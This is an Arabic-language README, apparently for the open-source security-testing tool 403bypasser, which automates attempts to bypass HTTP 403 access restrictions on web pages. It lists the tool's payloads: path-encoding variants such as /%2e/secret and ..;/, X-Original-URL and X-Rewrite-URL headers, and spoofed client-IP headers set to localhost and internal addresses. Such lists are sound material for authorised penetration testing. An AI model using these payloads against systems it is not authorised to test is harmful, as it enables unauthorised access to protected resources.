
تقوم بأتمتة تقنيات تجاوز التحكم في الوصول لإرجاع HTTP 403 باستخدام التلاعب بالرؤوس، وتعمية المسار، وتحويل طريقة HTTP لاختبار أمان تطبيقات الويب.

403bypasser يقوم بأتمتة التقنيات المستخدمة لتجاوز قيود التحكم في الوصول على الصفحات المستهدفة. سيستمر تطوير هذه الأداة، وهي مفتوحة للمساهمات.
403bypasser يقوم بأتمتة التقنيات المستخدمة لتجاوز قيود التحكم في الوصول على الصفحات المستهدفة. سيستمر تحسين 403bypasser وهو مفتوح للمساهمات.
git clone https://github.com/yunemse48/403bypasser.gitpip install -r requirements.txtالوسائط:
| الوسيطة | الوصف | أمثلة | ملاحظة |
|---|---|---|---|
| -u | عنوان URL واحد للمسح | http://example.com أو http://example.com/ | كل هذه الأمثلة يتم تفسيرها بنفس الطريقة |
| -U | مسار قائمة عناوين URL | ./urllist.txt، ../../urllist.txt، إلخ. | فقط قم بتقديم المسار حيث يوجد الملف :) |
| -d | دليل واحد للمسح | admin أو /admin أو admin/ أو /admin/ | كل هذه الأمثلة يتم تفسيرها بنفس الطريقة |
| -D | مسار قائمة الأدلة | ./dirlist.txt، ../../dirlist.txt، إلخ. | فقط قم بتقديم المسار حيث يوجد الملف :) |
الاستخدام 1: python3 403bypasser.py -u https://example.com -d /secret
الاستخدام 2: python3 403bypasser.py -u https://example.com -D dirlist.txt
الاستخدام 3: python3 403bypasser.py -U urllist.txt -d /secret
الاستخدام 4: python3 403bypasser.py -U urllist.txt -D dirlist.txt
ملاحظة مهمة: فيما يلي كلها تُفسر بنفس الطريقة. لذلك، أي نمط تستخدمه هو مجرد مسألة تفضيل.
python3 403bypasser.py -u https://example.com -d secret python3 403bypasser.py -u https://example.com -d /secret python3 403bypasser.py -u https://example.com -d /secret/ python3 403bypasser.py -u https://example.com -d secret/ python3 403bypasser.py -u https://example.com/ -d secret نظرًا لأن بايثون لغة متعددة المنصات، يمكن تشغيل هذا البرنامج على أنظمة تشغيل مختلفة.
يتم حفظ مخرجات البرنامج (في الدليل الحالي) في ملف يحمل اسم اسم المجال المُعطى كمدخل.
على سبيل المثال:
python3 403bypasser.py -u https://example.com -d /secret يتم إعطاؤها. ثم يتم حفظ المخرجات إلى example.txt في الدليل الحالي.
التغييرات في الإصدار v2.0: تم إجراء تغييرات كبيرة في هذا الإصدار. تم نقل المشروع بالكامل من Bash إلى Python 3. تمت إضافة تقنيات جديدة ومتنوعة.
التغييرات في الإصدار v1.1: أصبح من الممكن الآن تمرير الملفات (القوائم) إلى 403bypasser كمدخل عبر الوسائط. علاوة على ذلك، تمت إضافة حالتين اختباريتين إضافيتين:
التسميم باستخدام 1) رؤوس X-Original-URL و 2) X-Rewrite-URL.
/%2e/secret/secret//secret..;//secret/..;//secret%20/secret%09/secret%00/secret.json/secret.css/secret.html/secret?/secret??/secret???/secret?testparam/secret#/secret#test/secret/.//secret///./secret/./X-Original-URL: /secretX-Rewrite-URL: /secretالرؤوس:
X-Custom-IP-AuthorizationX-Forwarded-ForX-Forward-ForX-Remote-IPX-Originating-IPX-Remote-AddrX-Client-IPX-Real-IPالقيم:
localhostlocalhost:80localhost:443127.0.0.1127.0.0.1:80127.0.0.1:44321307064330x7F0000010177.0000.0000.00010127.110.0.0.010.0.0.1172.16.0.0172.16.0.1192.168.1.0192.168.1.1